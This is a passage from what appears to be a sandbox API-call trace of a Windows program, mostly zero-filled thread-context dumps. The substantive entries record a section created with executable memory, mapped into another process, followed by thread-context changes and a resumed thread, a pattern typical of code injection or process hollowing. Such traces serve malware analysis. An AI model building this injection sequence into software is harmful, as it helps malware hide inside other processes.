[111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.914] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.914] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x177200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x178000) returned 0x0 [0158.921] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x177200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x8f0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x178000) returned 0x0 [0158.950] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0158.961] NtClose (Handle=0x108) returned 0x0 [0158.961] NtSetContextThread (ThreadHandle=0x100, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x32f828, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x32f7d0, Eip=0x9d4707, SegCs=0x23, EFlags=0x246, Esp=0x32f7b4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.961] NtResumeThread (in: ThreadHandle=0x100, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.961] NtClose (Handle=0x104) returned 0x0 [0158.961] NtClose (Handle=0x100) returned 0x0 [0158.962] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbf4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x100) returned 0x0 [0158.962] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.962] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.963] NtReadVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.963] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.971] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbf8) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0158.971] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.971] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x100, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1f20000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.977] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x55fdc8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x55fd70, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x55fd54, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, 